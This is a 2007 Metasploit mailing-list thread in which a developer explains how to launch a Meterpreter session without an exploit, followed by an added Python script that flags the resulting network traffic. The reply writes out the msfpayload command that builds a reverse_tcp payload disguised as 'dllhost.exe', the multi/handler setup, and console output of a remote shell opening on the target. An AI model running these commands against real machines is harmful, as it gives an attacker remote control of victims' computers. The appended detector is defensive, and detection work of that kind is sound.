[framework] Meterpreter from a command line
mmiller at hick.org
Tue Feb 27 12:56:35 CST 2007
Chuck,
Client-side support for stdapi has not been implemented in C. However, you
should be able to accomplish what you're asking by using the payload handler
exploit. This will use Metasploit's built-in support for stdapi in Ruby, and
makes testing a whole lot easier.
Note: make sure you svn update, a recent change had slightly changed the behavior
of the payload handler which introduced some problems.
Here's how to go about this:
Step 1: Generate the executable that will act as the host for the meterpreter DLL.
This executable hosts the first stage of the payload (the reverse connect):
$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.4.79.2 X > dllhost.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 177
Options: LHOST=10.4.79.2
Step 2: Start the payload handler
$ ./msfconsole
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *

       =[ msf v3.0-beta-dev
+ -- --=[ 180 exploits - 104 payloads
+ -- --=[ 18 encoders - 5 nops
       =[ 31 aux
msf > use multi/handler
msf exploit(handler) > set LHOST 10.4.79.2
LHOST => 10.4.79.2
msf exploit(handler) > exploit
[*] Started reverse handler
[*] Starting the payload handler...
Step 3: Run dllhost.exe on the target computer
After running dllhost.exe, you should see this from msfconsole:
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (10.4.79.2:4444 -> 10.4.79.102:3031)
meterpreter > idletime
User has been idle for: 8 secs
meterpreter >
Keep in mind that you can use the payload handler from msfcli too.
Hope that helps.
On Tue, Feb 27, 2007 at 01:16:21PM -0500, Chuck Haines wrote:
> Hello all,
> I'm trying to write an example of using the meterpreter from the
> command line. What I want to do is have an exe that starts meterpreter
> and connects back to another machine. I have successfully written the
> code that starts the meterpreter and connects back and it communicates
> just fine. However when I try and load the stdapi, it tells me it
> loads it successfully, but doesn't actually give me the option of using
> it. Any help with this would be much appreciated. I'm using the
> metcli.exe that comes with the meterpreter to listen for a connection
> and custom code to connect back to the metcli.exe and perform the init
> on the metsrv.dll.
> In the previous release (2.7), I had to modify the metcli so it
> knew about the stdapi (well back then fs, net, etc), but it seems that
> the client portion of the stdapi no longer exists and there is only a
> server portion. Is that because it was never written or am I missing
> something? If someone could give a way to use msfconsole and have it
> spawn a meterpreter reverse_tcp without having to do an exploit, that
> would be the best.
>
> Thanks,
> Chuck
>
> --
> Chuck Haines
> chaines at gmail.com
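
Added example, not part of the original thread or of Metasploit: a defender-side check for the traffic shape visible in the console output above, where the host that initiates the connection receives the stager, stage and DLL from the responder. The record layout, function names and thresholds are assumptions, as is the premise that the initiator sends little or nothing before the push arrives.

```python
import ipaddress
from dataclasses import dataclass

# Assumed thresholds, not from the post: tune against your own traffic baseline.
MAX_INITIATOR_BYTES = 64     # initiator stays (nearly) silent before the push
MIN_PUSHED_BYTES = 50_000    # post shows 89 + 2834 + 73739 bytes sent to the target
DEFAULT_HANDLER_PORT = 4444  # port visible in the post's session line

@dataclass
class EarlyFlow:
    """Byte counts for the first seconds of a TCP flow (hypothetical record layout)."""
    initiator: str
    responder: str
    dport: int
    initiator_bytes: int   # initiator -> responder
    responder_bytes: int   # responder -> initiator

def reasons_for(flow: EarlyFlow) -> list[str]:
    """Return the reasons a flow looks like a staged reverse-connect delivery."""
    if not ipaddress.ip_address(flow.initiator).is_private:
        return []  # only connections initiated by our own hosts are in scope
    silent = flow.initiator_bytes <= MAX_INITIATOR_BYTES
    pushed = flow.responder_bytes >= MIN_PUSHED_BYTES
    if not (silent and pushed):
        return []
    reasons = [f"initiator sent {flow.initiator_bytes} B, received {flow.responder_bytes} B"]
    if flow.dport == DEFAULT_HANDLER_PORT:
        reasons.append("destination port 4444")
    return reasons

def flag_flows(flows):
    """Pair each suspicious flow with its reasons, keeping input order."""
    return [(f, r) for f in flows if (r := reasons_for(f))]

# Constructed sample records; the first mirrors the sizes in the post's console output.
SAMPLE = [
    EarlyFlow("10.4.79.102", "10.4.79.2", 4444, 0, 89 + 2834 + 73739),
    EarlyFlow("10.4.79.50", "198.51.100.7", 443, 517, 200_000),  # client spoke first (TLS hello)
    EarlyFlow("10.4.79.51", "10.4.79.9", 22, 21, 1_200),         # small banner exchange
    EarlyFlow("10.4.79.60", "203.0.113.20", 8443, 0, 120_000),   # silent initiator, large push
]

if __name__ == "__main__":
    for flow, why in flag_flows(SAMPLE):
        print(f"{flow.initiator} -> {flow.responder}:{flow.dport}: " + "; ".join(why))
```

The port match is only a supporting reason, since LPORT is configurable; the direction and size asymmetry is the part that still applies when the port changes.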